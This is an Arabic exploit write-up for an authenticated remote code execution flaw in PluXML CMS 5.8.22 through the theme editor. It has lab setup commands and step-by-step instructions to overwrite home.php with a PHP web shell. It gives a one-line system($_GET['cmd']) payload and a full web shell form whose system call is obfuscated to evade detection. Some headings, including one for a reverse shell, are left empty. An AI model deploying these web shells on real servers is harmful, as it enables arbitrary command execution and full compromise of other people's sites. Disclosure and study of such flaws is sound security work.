
تم تحديد ثغرة حرجة تتمثل في تنفيذ التعليمات البرمجية عن بُعد (RCE) في نظام إدارة المحتوى PluXML CMS الإصدار 5.8.22. تتيح هذه الثغرة للمسؤولين الموثّقين تنفيذ أكواد PHP عشوائية على خادم الويب عن طريق رفع أصداف ويب PHP خبيثة عبر وظيفة محرر القوالب.
git clone https://github.com/pluxml/PluXml.git
cd PluXml
ddev config --project-type=php --php-version=8.1 --docroot=.
ddev start
الاستغلال خطوة بخطوة
المصادقة: سجّل الدخول إلى لوحة تحكم المسؤول في PluXML باستخدام بيانات اعتماد مسؤول صالحة الانتقال إلى محرر القالب:
حقن حمولة خبيثة (Payload):
استبدل المحتوى الحالي في home.php بقشرة ويب (Web Shell) بلغة PHP
مثال على الحمولة: <?php system($_GET['cmd']); ?>
احفظ الملف المعدّل
تشغيل التنفيذ:
القشرة العكسية (Reverse Shell)
حمولة قشرة الويب (Webshell)
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input
type="TEXT"
name="cmd"
autofocus
id="cmd"
size="80"
>
<input
type="SUBMIT"
value="Execute"
>
</form>
<pre>
<?php
if (isset($_GET['cmd'])) {
$func_name = "sys" . "tem";
$func_name($_GET['cmd']);
}
?>
</pre>
</body>
</html>